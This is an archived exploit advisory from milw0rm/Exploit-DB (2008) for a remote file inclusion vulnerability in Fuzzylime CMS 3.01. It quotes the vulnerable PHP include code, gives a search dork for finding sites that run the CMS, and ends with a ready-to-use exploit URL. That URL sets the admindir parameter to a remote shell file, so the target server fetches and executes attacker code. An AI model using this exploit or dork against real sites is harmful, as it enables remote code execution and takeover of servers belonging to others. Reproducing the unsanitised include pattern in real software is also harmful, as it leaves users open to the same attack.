Fuzzylime CMS 3.01 - 'admindir' Remote File Inclusion

EDB-ID:

5260

Author:

irk4z

Type:

webapps

Platform:

PHP

Published:

2008-03-14

.-----------------------------------------------------------------------------.
|  vuln.: fuzzylime cms <= 3.01 Remote File Inclusion Vulnerability           |
|  download: http://cms.fuzzylime.co.uk/                                      |
|  dork: "powered by fuzzylime"                                               |
|                                                                             |
|  author: irk4z@yahoo.pl                                                     |
|  homepage: http://irk4z.wordpress.com/                                      |
|                                                                             |
|  greets to: cOndemned, str0ke, wacky                                        |
'-----------------------------------------------------------------------------'

# code:

  /code/display.php:
  ... 
1    <?
2    $s = $_GET[s];
3    $p = $_GET[p];
4    $s = str_replace("../", "", $s);
5    $p = str_replace("../", "", $p);
6    if(empty($s)) $s = "front";
7    if(empty($p)) $p = "index";
8    $curs = $s;
9    $curp = $p;
10
11   include "code/settings.inc.php";
12   include "${admindir}/languages/english.inc.php";
 ...

 line 11: ./code/code/settings.inc.php not exists so $admindir is empty :D:D
 
# exploit: 
 
 http://[HOST]/[PATH]/code/display.php?admindir=http://host/shell.txt?

# milw0rm.com [2008-03-14]